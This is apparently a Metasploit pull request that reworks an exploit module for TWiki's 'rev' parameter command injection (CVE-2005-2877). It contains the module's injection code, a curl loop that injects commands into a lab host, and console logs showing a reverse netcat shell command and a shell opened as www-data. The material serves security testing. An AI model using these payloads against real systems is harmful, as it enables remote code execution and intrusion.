### PR TITLE
twiki_history: Add revision+page options & Fetch payload support

### DIFF
--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -74,6 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
     test_file = rand_text_alphanumeric(8 + rand(8))
     cmd_base = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
     cmd_base << '?rev='
+    cmd_base << datastore['TWIKI_REVISION'].to_s
+    vprint_status("URI: #{cmd_base}")
     test_url = normalize_uri(datastore['URI'], test_file)
 
     # first see if it already exists (it really shouldn't)
@@ -81,55 +83,61 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => test_url
     }, 25)
     if (not res) or (res.code != 404)
-      vprint_warning("WARNING: The test file exists already!")
+      vprint_warning("The test file exists already! (HTTP #{res.code})")
       return Exploit::CheckCode::Unknown # Need to try again
     end
 
     # try to create it
-    vprint_status("Attempting to create #{test_url} ...")
-    rev = datastore['TWIKI_REVISION'].to_s
-    rev << ' `touch ' + test_file + '`#'
+    vprint_status("Attempting to create: #{test_url}")
+    rev = ' `touch ' + test_file + '`#'
     uri = cmd_base + Rex::Text.uri_encode(rev)
     res = send_request_raw({
       'uri' => uri
     }, 25)
     if (not res) or (res.code != 200)
+      vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       return Exploit::CheckCode::Safe
     end
 
     # try to run it, 500 code == successfully made it
+    vprint_status("Checking if created: #{test_url}")
     res = send_request_raw({
       'uri' => test_url
     }, 25)
     if (not res) or (res.code != 500)
+      vprint_warning("Error with exploit request (HTTP #{res.code}, should be 500)") unless res.code == 500
       return Exploit::CheckCode::Safe
     end
 
     # delete the tmp file
-    print_status("Attempting to delete #{test_url} ...")
-    rev = datastore['TWIKI_REVISION'].to_s
-    rev << ' `rm -f ' + test_file + '`#'
+    print_status("Attempting to delete: #{test_url}")
+    rev = ' `rm -f ' + test_file + '`#'
     uri = cmd_base + Rex::Text.uri_encode(rev)
     res = send_request_raw({
       'uri' => uri
     }, 25)
     if (not res) or (res.code != 200)
-      vprint_warning("WARNING: unable to remove test file (#{test_file})")
+      vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
+      print_warning("Unable to remove test file (#{test_file})")
     end
 
     return Exploit::CheckCode::Vulnerable
   end
 
   def exploit
-    rev = datastore['TWIKI_REVISION'].to_s
-    rev << ' `' + payload.encoded + '`#'
+    rev = ' `' + payload.encoded + '`#'
     cmd_base = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
     cmd_base << '?rev='
+    cmd_base << datastore['TWIKI_REVISION'].to_s
+    vprint_status("URI: #{cmd_base}")
+
     uri = cmd_base + Rex::Text.uri_encode(rev)
 
+    vprint_status("Sending payload")
     res = send_request_raw({
       'uri' => uri,
     }, 25)
+    vprint_status("Payload sent")
 
     if (res and res.code == 200)
       print_good("Successfully sent exploit request")

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2005-09-14',
         'Privileged' => true, # web server context
-        'Platform' => [ 'unix' ],
+        'Platform' => %w[unix linux],
         'Arch' => ARCH_CMD,
         'Payload' => {
           'DisableNops' => true,
@@ -47,6 +47,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [[ 'Automatic', {}]],
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'MeterpreterTryToFork' => true # Meterpreter payloads open then fail without Prepend forks
+        },
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -64,6 +64,12 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def send_request(uri)
+    send_request_cgi({
+      'uri' => uri
+    }, 25)
+  end
+
   #
   # NOTE: This is not perfect, since it requires write access to the bin
   # directory. Unfortunately, determining the main directory isn't
@@ -79,9 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("URI: #{rev_url}")
 
     # first see if it already exists (it really shouldn't)
-    res = send_request_raw({
-      'uri' => test_url
-    }, 25)
+    res = send_request(test_url)
     if (not res) or (res.code != 404)
       vprint_warning("The test file exists already! (HTTP #{res.code})")
       return Exploit::CheckCode::Unknown # Need to try again with a different file
@@ -90,10 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # try to create it
     vprint_status("Attempting to create: #{test_url}")
     rev = "`touch${IFS}" + test_file + "`"
-    uri = rev_url + Rex::Text.uri_encode(rev)
-    res = send_request_raw({
-      'uri' => uri
-    }, 25)
+    res = send_request(rev_url + Rex::Text.uri_encode(rev))
     if (not res) or (res.code != 200)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       return Exploit::CheckCode::Safe
@@ -102,9 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # try to run it
     # 500 code == successfully made it
     vprint_status("Checking if created: #{test_url}")
-    res = send_request_raw({
-      'uri' => test_url
-    }, 25)
+    res = send_request(test_url)
     if (not res) or (res.code != 500)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 500)") unless res.code == 500
       return Exploit::CheckCode::Safe
@@ -113,10 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # delete the tmp file
     print_status("Attempting to delete: #{test_url}")
     rev = "`rm${IFS}-f${IFS}" + test_file + "`"
-    uri = rev_url + Rex::Text.uri_encode(rev)
-    res = send_request_raw({
-      'uri' => uri
-    }, 25)
+    res = send_request(rev_url + Rex::Text.uri_encode(rev))
     if (not res) or (res.code != 200)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       print_warning("Unable to remove test file (#{test_file})")
@@ -134,12 +130,8 @@ class MetasploitModule < Msf::Exploit::Remote
     rev = '`' + payload.encoded + '`#'
     vprint_status("Executing command: #{payload.encoded}")
 
-    uri = rev_url + Rex::Text.uri_encode(rev)
-
     vprint_status("Sending payload")
-    res = send_request_raw({
-      'uri' => uri,
-    }, 25)
+    res = send_request(rev_url + Rex::Text.uri_encode(rev))
     vprint_status("Payload sent")
 
     fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -71,7 +71,8 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def check
     test_file = rand_text_alphanumeric(8 + rand(8))
-    cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=')
+    cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
+    cmd_base << '?rev='
     test_url = normalize_uri(datastore['URI'], test_file)
 
     # first see if it already exists (it really shouldn't)
@@ -87,8 +88,9 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Attempting to create #{test_url} ...")
     rev = datastore['TWIKI_REVISION'].to_s
     rev << ' `touch ' + test_file + '`#'
+    uri = cmd_base + Rex::Text.uri_encode(rev)
     res = send_request_raw({
-      'uri' => cmd_base + Rex::Text.uri_encode(rev)
+      'uri' => uri
     }, 25)
     if (not res) or (res.code != 200)
       return Exploit::CheckCode::Safe
@@ -106,8 +108,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempting to delete #{test_url} ...")
     rev = datastore['TWIKI_REVISION'].to_s
     rev << ' `rm -f ' + test_file + '`#'
+    uri = cmd_base + Rex::Text.uri_encode(rev)
     res = send_request_raw({
-      'uri' => cmd_base + Rex::Text.uri_encode(rev)
+      'uri' => uri
     }, 25)
     if (not res) or (res.code != 200)
       vprint_warning("WARNING: unable to remove test file (#{test_file})")
@@ -119,13 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     rev = datastore['TWIKI_REVISION'].to_s
     rev << ' `' + payload.encoded + '`#'
-    query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
-    query_str << '?rev='
-    query_str << Rex::Text.uri_encode(rev)
+    cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
+    cmd_base << '?rev='
+    uri = cmd_base + Rex::Text.uri_encode(rev)
 
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri'	=> query_str,
+    res = send_request_raw({
+      'uri' => uri,
     }, 25)
 
     if (res and res.code == 200)

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -36,16 +36,16 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'BID', '14834' ],
           [ 'URL', 'https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
         ],
+        'DisclosureDate' => '2005-09-14',
         'Privileged' => true, # web server context
+        'Platform' => [ 'unix' ],
+        'Arch' => ARCH_CMD,
         'Payload' => {
           'DisableNops' => true,
           'BadChars' => '',
-          'Space' => 1024,
+          'Space' => 1024
         },
-        'Platform' => [ 'unix' ],
-        'Arch' => ARCH_CMD,
         'Targets' => [[ 'Automatic', {}]],
-        'DisclosureDate' => '2005-09-14',
         'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
@@ -66,17 +66,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   #
   # NOTE: This is not perfect, since it requires write access to the bin
-  # directory. Unfortunately, detrmining the main directory isn't
+  # directory. Unfortunately, determining the main directory isn't
   # trivial, or otherwise I would write there (required to be writable
   # per installation steps).
   #
   def check
     test_file = rand_text_alphanumeric(8 + rand(8))
-    cmd_base = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
-    cmd_base << '?rev='
-    cmd_base << datastore['TWIKI_REVISION'].to_s
-    vprint_status("URI: #{cmd_base}")
     test_url = normalize_uri(datastore['URI'], test_file)
+    rev_url = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
+    rev_url << '?rev='
+    rev_url << datastore['TWIKI_REVISION'].to_s
+    vprint_status("URI: #{rev_url}")
 
     # first see if it already exists (it really shouldn't)
     res = send_request_raw({
@@ -84,13 +84,13 @@ class MetasploitModule < Msf::Exploit::Remote
     }, 25)
     if (not res) or (res.code != 404)
       vprint_warning("The test file exists already! (HTTP #{res.code})")
-      return Exploit::CheckCode::Unknown # Need to try again
+      return Exploit::CheckCode::Unknown # Need to try again with a different file
     end
 
     # try to create it
     vprint_status("Attempting to create: #{test_url}")
-    rev = ' `touch ' + test_file + '`#'
-    uri = cmd_base + Rex::Text.uri_encode(rev)
+    rev = "`touch${IFS}" + test_file + "`"
+    uri = rev_url + Rex::Text.uri_encode(rev)
     res = send_request_raw({
       'uri' => uri
     }, 25)
@@ -99,7 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe
     end
 
-    # try to run it, 500 code == successfully made it
+    # try to run it
+    # 500 code == successfully made it
     vprint_status("Checking if created: #{test_url}")
     res = send_request_raw({
       'uri' => test_url
@@ -111,8 +112,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # delete the tmp file
     print_status("Attempting to delete: #{test_url}")
-    rev = ' `rm -f ' + test_file + '`#'
-    uri = cmd_base + Rex::Text.uri_encode(rev)
+    rev = "`rm${IFS}-f${IFS}" + test_file + "`"
+    uri = rev_url + Rex::Text.uri_encode(rev)
     res = send_request_raw({
       'uri' => uri
     }, 25)
@@ -125,13 +126,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    rev = ' `' + payload.encoded + '`#'
-    cmd_base = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
-    cmd_base << '?rev='
-    cmd_base << datastore['TWIKI_REVISION'].to_s
-    vprint_status("URI: #{cmd_base}")
+    rev_url = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
+    rev_url << '?rev='
+    rev_url << datastore['TWIKI_REVISION'].to_s
+    vprint_status("URI: #{rev_url}")
 
-    uri = cmd_base + Rex::Text.uri_encode(rev)
+    rev = '`' + payload.encoded + '`#'
+    vprint_status("Executing command: #{payload.encoded}")
+
+    uri = rev_url + Rex::Text.uri_encode(rev)
 
     vprint_status("Sending payload")
     res = send_request_raw({
@@ -141,8 +144,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
     fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
-    print_good("Exploit complete")
-
-    handler
   end
 end

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -17,6 +17,13 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a vulnerability in the history component of TWiki.
           By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
           script, an attacker can execute arbitrary OS commands.
+
+          Affected versions:
+          - 20040902
+          - 20040901
+          - 20030201
+          - 20011201
+          - 20001201
         },
         'Author' => [
           'B4dP4nd4', # original discovery
@@ -27,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2005-2877' ],
           [ 'OSVDB', '19403' ],
           [ 'BID', '14834' ],
-          [ 'URL', 'http://web.archive.org/web/20230609051423/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
+          [ 'URL', 'https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
         ],
         'Privileged' => true, # web server context
         'Payload' => {

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -47,9 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [[ 'Automatic', {}]],
         'DefaultTarget' => 0,
-        'DefaultOptions' => {
-          'MeterpreterTryToFork' => true # Meterpreter payloads open then fail without Prepend forks
-        },
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,
@@ -67,10 +64,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def send_request(uri)
+  def send_request(uri, timeout = 25)
     send_request_cgi({
       'uri' => uri
-    }, 25)
+    }, timeout)
   end
 
   #
@@ -134,10 +131,16 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing command: #{payload.encoded}")
 
     vprint_status("Sending payload")
-    res = send_request(rev_url + Rex::Text.uri_encode(rev))
+    # Very short timeout because the request may never return if we're sending a socket payload
+    timeout = 0.1
+    res = send_request(rev_url + Rex::Text.uri_encode(rev), timeout)
     vprint_status("Payload sent")
 
-    fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
-    fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
+    # Due to short timeout, may take longer to get a response/shell/session, so not a big deal if this fails
+    if res.nil?
+      vprint_warning("The request received no response in the allotted time, and is expected, even if the exploit succeeds.")
+    elsif res.code != 200
+      vprint_error("Error with payload request (HTTP #{res.code}, should be 200)")
+    end
   end
 end

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -51,6 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
+        OptInt.new('TWIKI_REVISION', [ true, 'This revision number MUST exist', 1 ])
       ]
     )
   end
@@ -77,7 +78,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # try to create it
     vprint_status("Attempting to create #{test_url} ...")
-    rev = rand_text_numeric(1 + rand(5)) + ' `touch ' + test_file + '`#'
+    rev = datastore['TWIKI_REVISION'].to_s
+    rev << ' `touch ' + test_file + '`#'
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(rev)
     }, 25)
@@ -95,7 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # delete the tmp file
     print_status("Attempting to delete #{test_url} ...")
-    rev = rand_text_numeric(1 + rand(5)) + ' `rm -f ' + test_file + '`#'
+    rev = datastore['TWIKI_REVISION'].to_s
+    rev << ' `rm -f ' + test_file + '`#'
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(rev)
     }, 25)
@@ -107,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    rev = rand_text_numeric(1 + rand(5))
+    rev = datastore['TWIKI_REVISION'].to_s
     rev << ' `' + payload.encoded + '`#'
     query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
     query_str << '?rev='

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -12,11 +12,11 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'TWiki History TWikiUsers rev Parameter Command Execution',
+        'Name' => 'TWiki History Function Arbitrary Command Execution',
         'Description' => %q{
           This module exploits a vulnerability in the history component of TWiki.
-          By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
-          script, an attacker can execute arbitrary OS commands.
+          By passing a 'rev' parameter containing shell metacharacters,
+          an attacker can execute arbitrary OS commands.
 
           Affected versions:
           - 20040902
@@ -58,6 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
+        OptString.new('TWIKI_PAGE', [ true, "TWiki page to use for its history", "/view/Main/TWikiUsers" ]),
         OptInt.new('TWIKI_REVISION', [ true, 'This revision number MUST exist', 1 ])
       ]
     )
@@ -71,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def check
     test_file = rand_text_alphanumeric(8 + rand(8))
-    cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
+    cmd_base = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
     cmd_base << '?rev='
     test_url = normalize_uri(datastore['URI'], test_file)
 
@@ -122,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     rev = datastore['TWIKI_REVISION'].to_s
     rev << ' `' + payload.encoded + '`#'
-    cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
+    cmd_base = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
     cmd_base << '?rev='
     uri = cmd_base + Rex::Text.uri_encode(rev)
 

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -139,11 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
     }, 25)
     vprint_status("Payload sent")
 
-    if (res and res.code == 200)
-      print_good("Successfully sent exploit request")
-    else
-      fail_with(Failure::Unknown, "Error sending exploit request")
-    end
+    fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
+    fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
+    print_good("Exploit complete")
 
     handler
   end


### PR DESCRIPTION
Following on from https://github.com/rapid7/metasploit-framework/pull/20940 (& https://github.com/rapid7/metasploit-framework/pull/20943), `exploit/unix/webapp/twiki_history` time!

First issue, was `rev` being "random" (`rand_text_numeric(1 + rand(5))`). If this value doesn't exists as a revision id/value/number, then the exploit will fail.

Example:

```console
$ for x in $(seq 1 20); do
  echo -n "${x}: "; curl -s -o /dev/null -w "HTTP %{http_code} | Size %{size_download} bytes\n" http://10.0.0.10/twiki/bin/view/Main/TWikiUsers?rev=${x}%60touch%24%7bIFS%7d/tmp/test-${x}%60
done
1: HTTP 200 | Size 5624 bytes
2: HTTP 200 | Size 5838 bytes
3: HTTP 200 | Size 5500 bytes
4: HTTP 200 | Size 4652 bytes
5: HTTP 200 | Size 4954 bytes
6: HTTP 200 | Size 5200 bytes
7: HTTP 200 | Size 5491 bytes
8: HTTP 200 | Size 4483 bytes
9: HTTP 200 | Size 4628 bytes
10: HTTP 200 | Size 4725 bytes
11: HTTP 200 | Size 6351 bytes
12: HTTP 200 | Size 6508 bytes
13: HTTP 200 | Size 6413 bytes
14: HTTP 200 | Size 6696 bytes
15: HTTP 200 | Size 6644 bytes
16: HTTP 200 | Size 6699 bytes
17: HTTP 200 | Size 6649 bytes
18: HTTP 200 | Size 6649 bytes
19: HTTP 200 | Size 6649 bytes
20: HTTP 200 | Size 6649 bytes
$



msfadmin@metasploitable:~$ ls -1 /tmp/test* | sort -t- -k2,2n
/tmp/test-1
/tmp/test-2
/tmp/test-3
/tmp/test-4
/tmp/test-5
/tmp/test-6
/tmp/test-7
/tmp/test-8
/tmp/test-9
/tmp/test-10
/tmp/test-11
/tmp/test-12
/tmp/test-13
/tmp/test-14
/tmp/test-15
msfadmin@metasploitable:~$
```

This meant that both "check" (creating and deleting) and "exploit" could be seen as "flaky" at times.

- - - 

Another thing, it didn't HAVE to be `/view/Main/TWikiUsers`, it could be any? page (not hardcoded the value in)

- - - 

**Bonus**: Added dropper support too

# PoC

## Before

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; options; show targets;'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] No payload configured, defaulting to cmd/unix/php/meterpreter/reverse_tcp

Module options (exploit/unix/webapp/twiki_history):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /twiki/bin       yes       TWiki bin directory path
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Automatic


msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > check
[*] Attempting to create /twiki/bin/iz9f5PaV6UnV ...
[*] 10.0.0.10:80 - The target is not exploitable.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > check
[*] Attempting to create /twiki/bin/iz9f5PaV6UnV ...
[*] 10.0.0.10:80 - The target is not exploitable.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > check
[*] Attempting to create /twiki/bin/iz9f5PaV6UnV ...
[*] 10.0.0.10:80 - The target is not exploitable.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > check
[*] Attempting to create /twiki/bin/1ODcGxwJImU ...
[*] Attempting to delete /twiki/bin/1ODcGxwJImU ...
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > check
[*] Attempting to create /twiki/bin/iz9f5PaV6UnV ...
[*] 10.0.0.10:80 - The target is not exploitable.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[+] Successfully sent exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) >
```

- - - 

## After

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; set TARGET 0; options; show targets; run'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
TARGET => 0

Module options (exploit/unix/webapp/twiki_history):

   Name            Current Setting        Required  Description
   ----            ---------------        --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS          10.0.0.10              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT           80                     yes       The target port (TCP)
   SSL             false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TWIKI_PAGE      /view/Main/TWikiUsers  yes       TWiki page to use for its history
   TWIKI_REVISION  1                      yes       This revision number MUST exist
   URI             /twiki/bin             yes       TWiki bin directory path
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix Command)



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Automatic (Unix Command)
    1   Automatic (Linux Dropper)


[+] mkfifo /tmp/zlvhaj; nc 10.0.0.1 4444 0</tmp/zlvhaj | /bin/sh >/tmp/zlvhaj 2>&1; rm /tmp/zlvhaj
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Executing Automatic (Unix Command) for cmd/unix/reverse_netcat
[*] Executing command: mkfifo /tmp/emxms; nc 10.0.0.1 4444 0</tmp/emxms | /bin/sh >/tmp/emxms 2>&1; rm /tmp/emxms
[*] URI: /twiki/bin/view/Main/TWikiUsers?rev=1
[*] Using command-based payload
[*] Sending payload
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:35607) at 2026-02-10 09:55:23 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > sessions -i 1
[*] Starting interaction with 1...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
Background session 1? [y/N]  y
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > set TARGET 1
TARGET => 1
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > options

Module options (exploit/unix/webapp/twiki_history):

   Name            Current Setting        Required  Description
   ----            ---------------        --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS          10.0.0.10              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT           80                     yes       The target port (TCP)
   SSL             false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TWIKI_PAGE      /view/Main/TWikiUsers  yes       TWiki page to use for its history
   TWIKI_REVISION  1                      yes       This revision number MUST exist
   URI             /twiki/bin             yes       TWiki bin directory path
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)



View the full module info with the info, or info -d command.

msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Executing Automatic (Linux Dropper) for linux/x86/meterpreter/reverse_tcp
